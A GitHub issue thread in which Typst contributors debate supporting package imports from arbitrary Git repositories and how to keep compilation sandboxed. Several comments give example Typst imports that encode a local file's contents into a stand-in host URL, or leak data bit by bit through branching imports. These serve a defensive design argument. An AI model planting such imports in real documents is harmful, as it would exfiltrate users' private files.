### ISSUE TITLE
Add support for packages hosted in arbitrary repositories

### ISSUE THREAD

**Issue by BattleCh1cken** [typst/typst#4040]
### Description

It would be amazing if Typst supported git packages in addition to local and preview packages. This would allow users to download unofficial packages easily without the hassle of needing to use install scripts or the like. 

The syntax could look something like this:

```typ
#import "@git/battlech1cken/notebookinator:1.0.0"
```

This would then automatically download the package from that repository and make sure its in the correct directory, automatically excluding the files specified in the `typst.toml` file.

There are two major problems with this feature that I haven't really thought about yet.
- git packages obviously can't be reviewed by Typst team, leading to possible security problems.
-  I'm not sure how the web app will handle these types of packages, because I know that network requests there should be kept to a minimum.

### Use Case

Currently I maintain a library called [The Notebookinator](https://github.com/BattleCh1cken/notebookinator) which is rather large. For this reason I doubt it will be accepted as an official package, and I've had to resort to having users install it as a local package. I've included a script which allows for automatic installation, similar to the [CeTZ](https://github.com/cetz-package/cetz) package.

This is less than ideal for my users who now have to go through several steps to download my library, whereas official packages are incredibly easy to acquire.

This problem only gets worse if I need to modify or use unreleased versions of other packages I depend on, users or fellow developers will need to download all of those packages locally as well.

**Comment by Enter-tainer** [comment]
iirc it is not supported by design.(correct me if i'm wrong)

**Comment by istudyatuni** [comment]
It's planned, see [this message](https://discord.com/channels/1054443721975922748/1176122103355953162/1176125324430413955) in discord's \#forge channel

**Comment by laurmaedje** [comment]
Git imports would need to be handled with a lot of care to ensure Typst remains safe to run on untrusted input. I've written a longer comment explaining things here: https://github.com/typst/typst/pull/5579#issuecomment-2545034781

**Comment by JL710** [comment]
I think the most severe vulnerability that is mentioned in https://github.com/typst/typst/pull/5579#issuecomment-2545034781 is, that the network/downloads could be used to send data from the user to others by calling imports.
I think a way to prevent that would be to explicitly ask the user for any library that requires a download, if it should be downloaded. Once it is downloaded and in local storage, the vulnerability should be gone right?

**Comment by laurmaedje** [comment]
In principle yes, but I'd still like to avoid _dynamic_ network imports. See my comment here: https://github.com/typst/typst/pull/5579#issuecomment-2573103519

**Comment by RossSmyth** [comment]
This would be nice for workplace-internal templates.

**Comment by RossSmyth** [comment]
Here's a library that does this for you:
https://github.com/RossSmyth/press

**Comment by mewmew** [comment]
>> It's planned, see [this message](https://discord.com/channels/1054443721975922748/1176122103355953162/1176125324430413955) in discord's #forge channel

For reference, and to keep all information related to the issue discussion in one place, this is the referenced Discord message written by @laurmaedje at 11/20/23, 12:42 PM:

> We also had some ideas for the future of package distribution beyond @preview, but it's still very much in-flux. The rough idea is as follows:
>
> * Packages in a new root registry (that supersedes @preview) must adhere to higher standards (docs, test, APIs, screenshots-wise etc.). These packages must continue to follow the creative naming rules.
> * Packages in the root namespace will be advertised in a new storefront with screenshots, description, etc.
> * (Maybe) Organizations like publishers or universities could claim namespaces through a manual review process that checks they have a reasonable ownership claim for that namespace. Namespaces packages do not need to follow the creative naming rules. This would mostly be for things like official publisher templates.
> * In turn, packages can be imported from arbitrary git repositories. The web app will use a reverse proxy through typst.org. There will be configuration whether to (a) not allow any network access (not even the main registry), (b) always ask before downloads, (c) only ask for non-trusted downloads (i.e. git), which would be the default, (d) allow all downloads.
> * Git packages can be submitted for inclusion in a list that aids discoverability. This doesn't involve manual review, only some basic automated safety checks.
>
> The basic idea is that people can experiment with packages and provide less widely used packages as Git repositories with no stability guarantees (but the option to pin to a tag or hash). Packages that 'stick' can then be submitted to the root namespace. The root namespace will have good discoverability and high quality of packages (unlike crates.io). But still, everybody can have the flexibility to make a package easily available via Git.

**Comment by haydntrowell** [comment]
A possible middle ground here is to allow Git‑hosted packages only if they are fetched once up‑front and fully vendored, with no further network requests allowed from inside the package.

That avoids the exfiltration concerns raised in #5579 because:
- imports inside the package can’t trigger more downloads
- URLs inside the package can’t be used as a data‑dependent channel
- evaluation still happens with zero network access

This keeps Typst’s sandbox intact while still letting users pull packages from Git repos when needed (e.g., internal templates, decentralized workflows, or non‑Universe packages).

In terms of syntax, using the git address and a tag, as in:

```typst
#import "@github.com/user/repo:1.2.3": *
```

or:

```typst
#import "https://github.com/user/repo.git:1.2.3": *
```

would make Git packages feel identical to Universe packages, just with a different source.

**Comment by alerque** [comment]
> A possible middle ground here is to allow Git‑hosted packages only if they are fetched once up‑front and fully vendored

Can't you already achieve that using local packages?

And wouldn't the difference between the already supported workflow where you fetch something up front yourself and allowing an arbitrary Git forge URL in the import statement that Typst fetches for you be the difference of making that URL a data exfiltration vector?

**Comment by haydntrowell** [comment]
> Can't you already achieve that using local packages?

Yes, but convenience is the entire point. Package managers exist because manually fetching dependencies is tedious and error-prone. This is no different.

> And wouldn't the difference between the already supported workflow where you fetch something up front yourself and allowing an arbitrary Git forge URL in the import statement that Typst fetches for you be the difference of making that URL a data exfiltration vector?

For the URL itself to be an exfiltration vector, the person writing it would have to manually encode sensitive data into it themselves. At that point, we're not talking about a security vulnerability in the tooling, we're talking about a user manually sending their own data somewhere. That said, one reasonable mitigation would be strict validation of the URL structure—a Git import should look exactly like a Git import: scheme, host, org, repo, tag, nothing else. No query strings or unusual segments. That would limit how much could be smuggled into a URL even in the worst case, and would make the feature's behavior more predictable overall.

**Comment by cady-b** [comment]
> the person writing it would have to manually encode sensitive data into it themselves

I'm not sure I fully understand this bit. The following works:
```typ
#import "@preview/" + "qalil".rev() + ":" + str(version(0,6,0)): diagram
#diagram()
```
And the security model includes [untrusted sources](https://typst.app/open-source#faq:~:text=We%20take%20special%20care). So something like this would also have to be considered:
```typ
#import "git@custom-domain/grabber/" + some-safe-encoding(read("personal-information.txt")) + ":0.1.0"
```
which I consider a pretty significant issue that likely requires additional validation steps. Ideally the source should be restricted to a static string literal and the import statement mustn't be within a code path that can branch, but that may interfere with legitimate use cases (i.e. switching between different remote themes depending on a setting).

<details>
<summary>"mustn't branch" proof of concept (quite silly, but yk)</summary>

```typ
#{
  let data = (0,1,0,1)
  if data.at(0) == 0 { import "git@domain/a:0.0.1" } else { import "git@domain/b:0.0.1" }
  if data.at(1) == 0 { import "git@domain/ca:0.0.1" } else { import "git@domain/cb:0.0.1" }
  if data.at(2) == 0 { import "git@domain/cca:0.0.1" } else { import "git@domain/ccb:0.0.1" }
  if data.at(3) == 0 { import "git@domain/ccca:0.0.1" } else { import "git@domain/cccb:0.0.1" }
}
```
</details>

**Comment by alerque** [comment]
> That said, one reasonable mitigation would be strict validation of the URL structure—a Git import should look exactly like a Git import: scheme, host, org, repo, tag, nothing else.

This is impossible in two ways:

* You cannot feasibly whitelist all the valid URL schemes used to reach Git hosts, especially from internal networks.
* It is trivial to exfiltrate sensitive data through queries to things that exactly match your expected schemes.

@cady-b already demonstrated how the import can be constructed, now figure that somebody can craft a function that scrapes private data, encodes it in something like base64. Name it something innocuous, and obfuscate the actual function contents. Then use it to formulate an import that looks pretty okay and passes your schema check:

```typst
#import "https://myforge.domain.org/naughtythemer/" + match-system-theme() + ":0.1.0"
```

**Comment by haydntrowell** [comment]
> Ideally the source should be restricted to a static string literal and the import statement mustn’t be within a code path that can branch

Yes, exactly. This is actually core to what I’m suggesting. The dynamic construction demonstrated here:

> #import "git@custom-domain/grabber/" + some-safe-encoding(read("personal-information.txt")) + ":0.1.0"

…is the problem, not remote imports themselves. I’m suggesting to enforce at the language level that import URLs must be static string literals, at least for remote Git packages. No concatenation, no function calls, no branching. That makes the examples above a syntax error that will not resolve.

**Comment by laurmaedje** [comment]
Requiring string literals in imports is not enough by itself. See the latter parts of https://github.com/typst/typst/pull/5579#issuecomment-2545034781 for details.

We'd also need to ensure all imports/includes occur unconditionally. Then, we could fetch everything eagerly (traversing down the whole file and package dependency tree) before starting compilation. For imports, that _might_ be fine, but for `include` it can be very useful to have it happen conditionally (and also dynamically, fwiw), e.g. to add a chapter dynamically or include chapters in a loop. And as soon as those contain imports, we're back to square one.

And then there's `eval` of course, but that's not too big of a deal to sort out I think.

**Comment by haydntrowell** [comment]
> Requiring string literals in imports is not enough by itself. See the latter parts of [#5579 (comment)](https://github.com/typst/typst/pull/5579#issuecomment-2545034781) for details.

On the covert channel attack outlined in #5579, it seems to me the reason this works is that code has already begun executing by the time the network request is triggered, making it possible to encode data in the pattern of requests rather than their content. This could be fixed by ensuring that no code has executed at the point dependencies are fetched. If import statements are restricted to static string literals and disallowed inside branching or looping code paths, you can scan the source file upfront, fetch and cache everything, and begin compilation with no network access at all. That closes the covert channel entirely, and it means a separate manifest file isn't strictly necessary. The source file itself serves as the manifest.

> We'd also need to ensure all imports/includes occur unconditionally. Then, we could fetch everything eagerly (traversing down the whole file and package dependency tree) before starting compilation. For imports, that _might_ be fine, but for `include` it can be very useful to have it happen conditionally (and also dynamically, fwiw), e.g. to add a chapter dynamically or include chapters in a loop. And as soon as those contain imports, we're back to square one.
> 
> And then there's `eval` of course, but that's not too big of a deal to sort out I think.

On the include concern: I think this points to a deeper architectural question worth addressing directly. `include` and `import` are different operations: `include` is content composition, `import` is dependency declaration. Conflating the two is what creates these edge cases. If included files are simply not permitted to contain package imports (or at least, not allowed to contain remote Git package imports), the conditional include problem disappears entirely. Dependency resolution becomes strictly a top-level, pre-compilation concern: all imports declared statically at the top level, fetched eagerly before evaluation begins, with no new dependencies introducible downstream.

Actually, this separation feels like the right architectural direction regardless of whether remote imports are supported. It makes the dependency graph fully knowable before a single line of code executes, which is a useful property in general.

**Comment by laurmaedje** [comment]
I agree that this is a possible approach and that knowing the dependency graph would be a useful property, but just saying "included files may not contain package imports" will be very restrictive. What if you want to use your git-hosted drawing package in chapter 1 of your document?

It's also not necessary to have include and import differ I think. The important part is that it's statically resolved and includes could be scanned just like imports could. Then, we'd only have issues with package imports in dynamic includes not working.

An alternative that requires none of all that would be to require a `typst.toml` manifest with dependency declarations for Git packages.

**Comment by saecki** [comment]
We could allow using already statically resolved git dependencies in the conditionally included places.
Thus the workaround I see for these cases would just require the user to import the git dependencies in a place that is always statically evaluated, for example in `main.typ` or in a `deps.typ`. After that they'd be free to import them them in any other place.

From an implementation perspective this would mean we'd just fetch the statically imported git dependencies up-front. And fail at "runtime" when a git import is used that hasn't been already statically resolved.

**Comment by haydntrowell** [comment]
A full upfront scan of the entire file tree would largely achieve what @saecki is suggesting, as every static import would be found and resolved before compilation regardless of where it's declared. The exception is dynamic includes, where any Git packages used inside would need to be imported somewhere static the scanner can reach, failing otherwise.

I'd be happy to take a stab at implementing something here, but as someone new to the codebase, I'd want to make sure there's a direction the maintainers are broadly comfortable with first. What I'd pursue is static Git imports scanned and resolved upfront before compilation begins, with all packages cached locally so compilation itself runs fully offline with no network access. Would that be roughly aligned with what you would be happy to see?

**Comment by laurmaedje** [comment]
I'm sorry to keep stalling this, but I'm not yet ready to make a design decision on the matter unfortunately. How we approach this topic will have lasting influence on the package ecosystem, security, `typst.toml` for projects, our web app, and more. There are a few options in the room now that aren't too bad, but I can't commit to one yet.

I wish it were just a matter of implementation, but getting this right is pretty important and so far I personally see some pieces falling into place, but not yet a comprehensive vision for the package management story.

**Comment by haydntrowell** [comment]
Understood, no rush. I appreciate the thoughtfulness going into it. I know it would be a breaking change in the file format, but one thing I would strongly recommend, from a security standpoint, is that all imports be static string literals, including Typst Universe packages. Even if Typst Universe is trusted, allowing dynamic imports leaves the covert channel mentioned above open, and it could theoretically be taken advantage of if Typst Universe itself were compromised. Architecturally, it would be safest if the language itself made this impossible by design. And of course, this security guarantee would then carry forward to remote imports down the line.

**Comment by saecki** [comment]
> A full upfront scan of the entire file tree would largely achieve what @saecki is suggesting, as every static import would be found and resolved before compilation regardless of where it's declared. The exception is dynamic includes, where any Git packages used inside would need to be imported somewhere static the scanner can reach, failing otherwise.

A downside of this approach would be that if you have a directory with files that don't depend on each other, every git dependency will be fetched, even if you only compile a single file. Notes would be a good example of self-contained files often stored in a single directory.
It's also undesirable to do the full directory scan in general. Imagine you have a Typst file on your desktop, or another directory quite high up the file system hierarchy.

What we could do in addition to fetching the git imports in statically imported files, is to also traverse the files that are conditionally imported but have a string literal.

**Comment by haydntrowell** [comment]
Worth mentioning: I was playing around to see what's possible and ended up implementing a prototype of this model in [Typesetter](https://codeberg.org/haydn/typesetter/) behind a compile-time feature flag.

The approach uses statically-resolvable Git imports, resolves/fetches dependencies before evaluation begins, and compilation itself runs with no network access afterward for security. In practice, it works quite well ergonomically.

I’m not posting this as “the solution,” since I understand the broader ecosystem/package-management concerns here are significant, but it may be useful as prior art while thinking through the design space. Happy to share implementation details if that would be helpful.

At the very least, it may be worth converging on a common syntax shape early so third-party implementations/tooling experiments don’t end up fragmenting around incompatible import syntaxes later on. Would that be something you’d be open to?
